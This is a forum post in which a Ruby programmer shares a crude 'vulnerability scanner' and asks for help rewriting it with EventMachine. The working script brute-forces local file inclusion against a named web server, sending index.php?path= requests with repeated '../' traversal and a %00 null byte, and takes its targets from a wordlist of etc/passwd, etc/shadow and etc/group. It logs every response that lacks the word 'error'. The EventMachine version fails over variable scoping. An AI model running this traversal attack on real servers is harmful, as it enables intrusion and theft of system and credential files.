From 'socket' to 'eventmachine' http client

Ruby
1

im working on a vulnerability scanner, basically a http client… i have
a working script that only uses ‘socket’ but if i was using eventmachine
i would get better performance…

[working-script]
require ‘socket’
my_file = File.new(“log.txt”, ‘w’)
html = File.new(“log.html”,“w”)
IO.foreach(“list.lfi”) do |block|
host = ‘www.i8igmac.com’ # The web server
port = 80 # Default HTTP port
dir = “…/”
mply=0
while mply < 10

This is the HTTP request we send to fetch a file

request = “GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n”
socket = TCPSocket.open(host,port) # Connect to server
socket.print(request+“Host: “+host+”\r\n\r\n”) # Send
request
response = socket.read # Read complete response

Split response at first blank line into headers and body

headers,body = response.split(“\r\n\r\n”, 2)
print request
#print body # And display it
check=body.scan(“error”)

mply=mply+1

if check.to_s == “error”
print ‘no inclusion’
else
print ‘Please notify site owner of exploit\n’+request
my_file.puts request
html.puts request
html.puts body.tr(“www.”, “www”)

end
end
end
[working-script-end]

[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]

this script reads each line from the list then sends out a GET request,
if a config file is found viewable to the public then this will be
logged…

this script does not handle any kind of protocal, its more of a crude
ruff draft… if i could get eventmachine to handle the protocall
performance would increase and script wouldnt crash…

here is my attempt to use eventmachine…

[em-code]
require ‘rubygems’
require ‘eventmachine’
my_file = File.new(“log.txt”, ‘w’)
html = File.new(“out.htm”,“w”)
IO.foreach(“list.lfi”) do |block|
lfihost = ‘www.i8igmac.com’ # The web server
port = 80 # Default HTTP port
dir = “…/”
mply=0
while mply < 10
request = “GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n”

module DumbHttpClient
def post_init
print request
send_data request
@data = “”
@parsed = false
end

def receive_data data
@data << data
headers,body = data.split(“\r\n\r\n”, 2)
print data
EventMachine::stop_event_loop
end

end
EventMachine::run {
EventMachine::connect “www.i8igmac.com”, 80, DumbHttpClient
}
puts “The event loop has ended”

print request
#print body # And display it
check=body.scan(“error”)
mply=mply+1
if check.to_s == “error”
print ‘no inclusion’
else
print ‘FOUND ONE\n’+request
my_file.puts request
html.puts request
html.puts body.tr(“www.”, “www”)
end
end
end
[em-end]

any one with eventmachine expearnce could give me some help… i dont
understand why strings wont exist inside the function… clueless at this
point